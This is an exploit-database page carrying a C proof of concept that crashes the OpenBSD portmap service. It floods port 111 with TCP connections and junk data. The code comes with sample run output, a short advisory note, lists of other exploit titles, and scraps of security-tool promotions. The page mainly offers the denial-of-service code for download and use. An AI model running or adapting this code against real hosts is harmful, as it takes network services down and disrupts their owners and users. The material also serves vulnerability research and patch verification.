Menu

Search for hundreds of thousands of exploits

"OpenBSD 4.x - Portmap Remote Denial of Service"

Author

Exploit author

auto236751

Platform

Exploit platform

bsd

Release date

Exploit published date

2012-11-22

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
// source: https://www.securityfocus.com/bid/56671/info

OpenBSD is prone to a remote denial-of-service vulnerability.

Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.

OpenBSD versions prior to 5.2 are vulnerable. 

/*
 * authors: 22733db72ab3ed94b5f8a1ffcde850251fe6f466
 *          6e2d3d47576f746e9e65cb4d7f3aaa1519971189
 *          c8e74ebd8392fda4788179f9a02bb49337638e7b
 * 
 *  greetz: 43c86fd24bd63b100891ec4b861665e97230d6cf
 *          e4c0f3f28cf322779375b71f1c14d6f8308f789d
 *          691cb088c45ec9e31823ca7ab0da8b4cf8079baf
 *          b234a149e7ef00abc0f2ec7e6cf535ef4872eabc
 *
 *
 * -bash-4.2$ uname -a
 * OpenBSD obsd.my.domain 5.1 GENERIC#160 i386
 * -bash-4.2$ id
 * uid=32767(nobody) gid=32767(nobody) groups=32767(nobody)
 * -bash-4.2$ netstat -an -f inet | grep 111
 * tcp          0      0  127.0.0.1.111          *.*                    LISTEN
 * tcp          0      0  *.111                  *.*                    LISTEN
 * udp          0      0  127.0.0.1.111          *.*
 * udp          0      0  *.111                  *.*
 * -bash-4.2$ gcc openbsd_libc_portmap.c
 * -bash-4.2$ ./a.out
 * [+] This code doesn't deserve 1337 status output.
 * [+] Trying to crash portmap on 127.0.0.1:111
 * [+] 127.0.0.1:111 is now down.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define HOST "127.0.0.1"
#define PORT 111
#define LOOP 0x100


int main(void)
{
    int s, i;
    struct sockaddr_in saddr;

    printf("[+] This code doesn't deserve 1337 status output.\n");
    printf("[+] Trying to crash portmap on %s:%d\n", HOST, PORT);

    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(PORT);
    saddr.sin_addr.s_addr = inet_addr(HOST);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1) {
        printf("[-] %s:%d is already down.\n", HOST, PORT);
        return EXIT_FAILURE;
    }

    /* # of iteration needed varies but starts working for > 0x30  */
    for(i=0; i < LOOP; ++i) {
        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in));
        send(s, "8========@", 10, 0);
    }

    if(connect(s, (struct sockaddr *) &saddr, sizeof(struct sockaddr_in)) == -1)
        printf("[+] %s:%d is now down.\n", HOST, PORT);
    else
        printf("[-] %s:%d is still listening. Try to increase loop iterations...\n");

    return EXIT_SUCCESS;
}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2016-07-21 "NetBSD - 'mail.local(8)' Local Privilege Escalation" local bsd akat1
2015-09-28 "Watchguard XCS - Remote Command Execution (Metasploit)" remote bsd Metasploit
2015-09-28 "Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)" local bsd Metasploit
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-12-02 "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side" remote bsd dash
2014-11-06 "Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)" remote bsd Metasploit
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-11-22 "OpenBSD 4.x - Portmap Remote Denial of Service" dos bsd auto236751
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
Release Date Title Type Platform Author
2012-11-22 "OpenBSD 4.x - Portmap Remote Denial of Service" dos bsd auto236751 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected